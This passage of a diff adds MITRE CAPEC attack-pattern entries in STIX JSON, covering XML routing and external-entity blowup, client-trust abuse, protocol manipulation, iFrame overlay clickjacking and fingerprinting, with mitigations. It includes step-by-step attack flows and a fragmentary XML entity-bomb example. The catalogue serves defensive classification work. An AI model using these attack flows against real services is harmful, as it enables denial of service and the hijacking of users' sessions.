", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The targeted system must have multiple stages processing of XML content." + ], + "x_capec_resources_required": [ + "The attacker must be able to insert or compromise a system into the processing path for the transaction." + ], + "x_capec_skills_required": { + "Low": "To inject a bogus node in the XML routing table" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Specify maximum number intermediate nodes for the request and require SSL connections with mutual authentication.", + "id": "course-of-action--32d253b1-9a81-4e1f-9e76-b03889c23824", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-219-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--50e9645d-eacc-4146-b4c7-2d3fccb9d553", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--32d253b1-9a81-4e1f-9e76-b03889c23824", + "target_ref": "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use SSL for connections between all parties with mutual authentication.", + "id": "course-of-action--a5db9d2f-be59-4342-b37c-e5716afbb21d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-219-1", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad2e36bd-7078-49d5-84e3-b333131d9839", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a5db9d2f-be59-4342-b37c-e5716afbb21d", + "target_ref": "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. 
There are numerous variations of this type of attack.", + "external_references": [ + { + "external_id": "CAPEC-22", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Exploiting Trust in Client", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some client-server 
round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information.", + "Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements.", + "Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information.", + "Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. 
However, if the message server does not or cannot authenticate the authorization information in the request then the server's policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0" + ], + "x_capec_prerequisites": [ + "Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server" + ], + "x_capec_skills_required": { + "Medium": "The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that client process and/or message is authenticated so that anonymous communications and/or messages are not accepted by the system.", + "id": "course-of-action--2e4bbf17-d58f-437c-921e-69938467c2d2", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef29ae67-0988-4232-84e9-43b9c15d46eb", + "modified": "2019-09-30T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e4bbf17-d58f-437c-921e-69938467c2d2", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Do not rely on client validation or encoding for security purposes.", + "id": "course-of-action--040e99bd-3494-432d-a072-6400fc8f9043", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b53a383-dcc4-4eb9-a9b9-4b7b9cfc1401", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040e99bd-3494-432d-a072-6400fc8f9043", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize digital signatures to increase authentication assurance.", + "id": "course-of-action--03a878aa-814d-4ec7-8981-4019491f098a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--c8ac652e-3dc2-4676-8383-373e67124466", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03a878aa-814d-4ec7-8981-4019491f098a", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize two factor authentication to increase authentication assurance.", + "id": "course-of-action--4cfdedd8-f75c-4aa9-8e79-a60fe00a2f6b", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bef5f4f9-1fce-4a46-b4fb-7c23116a91fc", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4cfdedd8-f75c-4aa9-8e79-a60fe00a2f6b", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f8b75f6-daad-4ca8-b8eb-fba33ce31e5c", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": 
"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary takes advantage of weaknesses in the protocol by which a client and server are communicating to perform unexpected actions. Communication protocols are necessary to transfer messages between client and server applications. Moreover, different protocols may be used for different types of interactions.", + "external_references": [ + { + "external_id": "CAPEC-220", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/220.html" + }, + { + "external_id": "CWE-757", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/757.html" + } + ], + "id": "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Client-Server Protocol Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n For example, an authentication protocol might be used to establish the identities of the server and client while a separate messaging protocol might be used to exchange data. If there is a weakness in a protocol used by the client and server, an attacker might take advantage of this to perform various types of attacks. For example, if the attacker is able to manipulate an authentication protocol, the attacker may be able spoof other clients or servers. If the attacker is able to manipulate a messaging protocol, the may be able to read sensitive information or modify message contents. This attack is often made easier by the fact that many clients and servers support multiple protocols to perform similar roles. 
For example, a server might support several different authentication protocols in order to support a wide range of clients, including legacy clients. Some of the older protocols may have vulnerabilities that allow an attacker to manipulate client-server interactions.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--13d1d169-0023-41e2-952f-7d794844733b", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda" + ], + "x_capec_prerequisites": [ + "The client and/or server must utilize a protocol that has a weakness allowing manipulation of the interaction." + ], + "x_capec_resources_required": [ + "The adversary must be able to identify the weakness in the utilized protocol and exploit it. This may require a sniffing tool as well as packet creation abilities. The adversary will be aided if they can force the client and/or server to utilize a specific protocol known to contain exploitable weaknesses." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. 
This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.", + "external_references": [ + { + "external_id": "CAPEC-221", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/221.html" + }, + { + "external_id": "CWE-611", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/611.html" + }, + { + "description": "XML External Entities", + "external_id": "43", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-External-Entities" + } + ], + "id": "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Data Serialization External Entities Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "attack-pattern--b6f5248a-346f-484f-8091-8ab84288aa81" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, the XML parser parses the attacker's XML and opens the malicious URI where the attacker controls the server and writes a massive amount of data to the response stream. In this example the malicious URI is a large file transfer.\n < !DOCTYPE bomb []>&detonate;\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target web service: The adversary must first find a web service that takes input data in the form of a serialized language such as XML or YAML.

Experiment

  1. Host malicious file on a server: The adversary will create a web server that contains a malicious file. This file will be extremely large, so that if a web service were to try to load it, the service would most likely hang.

  2. Craft malicious data: Using the serialization language that the web service takes as input, the adversary will craft data that links to the malicious file using an external entity reference to the URL of the file.

Exploit

  1. Send serialized data containing URI: The adversary will send specially crafted serialized data to the web service. When the web service loads the input, it will attempt to download the malicious file. Depending on the amount of memory the web service has, this could either crash the service or cause it to hang, resulting in a Denial of Service attack.

", + "x_capec_prerequisites": [ + "A server that has an implementation that accepts entities containing URI values." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by tweaking the XML parser to not resolve external entities. If external entities are needed, then implement a custom XmlResolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.", + "id": "course-of-action--f88600ce-ddcc-4bc8-a94c-55d673aaa78d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-221-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56e07d24-a92d-4fa8-813a-42ce29f65724", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f88600ce-ddcc-4bc8-a94c-55d673aaa78d", + "target_ref": "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by tweaking the serialized data parser to not resolve external entities. 
If external entities are needed, then implement a custom resolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.", + "id": "course-of-action--1d15fec6-8b70-44d9-b58a-5c9aebb8153b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-221-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d30d657-82b7-41fb-8963-2316f86a288e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1d15fec6-8b70-44d9-b58a-5c9aebb8153b", + "target_ref": "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In an iFrame overlay attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from seemingly completely different system.", + "external_references": [ + { + "external_id": "CAPEC-222", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/222.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Michal Zalewski, Browser Security Handbook, 2008, Google Inc.", + "external_id": "REF-84", + "source_name": "reference_from_CAPEC", + "url": "https://code.google.com/archive/p/browsersec/wikis/Main.wiki" + }, + { + "description": "M. 
Mahemoff, Explaining the \"Don't Click\" Clickjacking Tweetbomb, 2009--02---12, Software As She's Developed", + "external_id": "REF-85", + "source_name": "reference_from_CAPEC", + "url": "http://softwareas.com/explaining-the-dont-click-clickjacking-tweetbomb" + } + ], + "id": "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "iFrame Overlay", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The following example is a real-world iFrame overlay attack [2]. In this attack, the malicious page embeds Twitter.com on a transparent IFRAME. The status-message field is initialized with the URL of the malicious page itself. To provoke the click, which is necessary to publish the entry, the malicious page displays a button labeled \"Don't Click.\" This button is aligned with the invisible \"Update\" button of Twitter. Once the user performs the click, the status message (i.e., a link to the malicious page itself) is posted to their Twitter profile." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Craft an iFrame Overlay page: The adversary crafts a malicious iFrame overlay page.

  2. Techniques
    The adversary leverages iFrame overlay capabilities to craft a malicious iFrame overlay page.

Exploit

  1. adversary tricks victim to load the iFrame overlay page: adversary utilizes some form of temptation, misdirection or coercion to trick the victim to loading and interacting with the iFrame overlay page in a way that increases the chances that the victim will visit the malicious page.

  2. Techniques
    Trick the victim to the malicious site by sending the victim an e-mail with a URL to the site.
    Trick the victim to the malicious site by manipulating URLs on a site trusted by the victim.
    Trick the victim to the malicious site through a cross-site scripting attack.
  3. Trick victim into interacting with the iFrame overlay page in the desired manner: The adversary tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim's level of privilege.

  4. Techniques
    Hide action controls over very commonly used functionality.
    Hide action controls over very psychologically tempting content.
", + "x_capec_extended_description": "\n While being logged in to some target system, the victim visits the adversarys' malicious site which displays a UI that the victim wishes to interact with. In reality, the iFrame overlay page has a transparent layer above the visible UI with action controls that the adversary wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the adversary may have just tricked the victim into executing some potentially privileged (and most undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking on.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The victim is communicating with the target application via a web based UI and not a thick client. The victim's browser security policies allow iFrames. The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser). The victim has an active session with the target system. The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "Crafting the proper malicious site and luring the victim to this site is not a trivial task." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable iFrames in the Web browser.", + "id": "course-of-action--da7d677a-ae6f-4b92-b6a4-578b18ac2096", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-222-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f004d2c5-c636-4b39-9be8-fbf612902dbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da7d677a-ae6f-4b92-b6a4-578b18ac2096", + "target_ref": "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operation: When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. 
Finish working with the target system and logout first before proceeding to other tasks.", + "id": "course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-222-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8ceb66f2-318c-41f7-9c7f-8411d9e9db00", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353", + "target_ref": "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operation: If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.", + "id": "course-of-action--37728b90-749a-4550-90b1-0befc14f3052", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-222-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--653bb15f-3973-4933-b573-881524838af8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--37728b90-749a-4550-90b1-0befc14f3052", + "target_ref": "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "type": "relationship", + "x_capec_version": "3.9" + }, 
+ { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary compares output from a target system to known indicators that uniquely identify specific details about the target. Most commonly, fingerprinting is done to determine operating system and application versions. Fingerprinting can be done passively as well as actively. Fingerprinting by itself is not usually detrimental to the target. However, the information gathered through fingerprinting often enables an adversary to discover existing weaknesses in the target.", + "external_references": [ + { + "external_id": "CAPEC-224", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/224.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Fingerprinting", + "external_id": "45", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Fingerprinting" + } + ], + "id": "attack-pattern--76e6fe1e-34f2-40cd-8f12-f4d4f9c41808", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617", + "attack-pattern--f40c59ce-f023-4e3e-937e-07fa2b7bc3ec", + "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290" + ], + "x_capec_prerequisites": [ + "A means by which to interact with the target system directly." 
+ ], + "x_capec_resources_required": [ + "If on a network, the adversary needs a tool capable of viewing network communications at the packet level and with header information, like Mitmproxy, Wireshark, or Fiddler." + ], + "x_capec_skills_required": { + "Medium": "Some fingerprinting activity requires very specific knowledge of how different operating systems respond to various TCP/IP requests. Application fingerprinting can be as easy as envoking the application with the correct command line argument, or mouse clicking in the appropriate place on the screen." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "While some information is shared by systems automatically based on standards and protocols, remove potentially sensitive information that is not necessary for the application's functionality as much as possible.", + "id": "course-of-action--e117150b-4841-447b-aef4-8a9aa1d5ad94", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-224-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1eb63bf7-b7b2-4e41-9dfa-0544c490911b", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 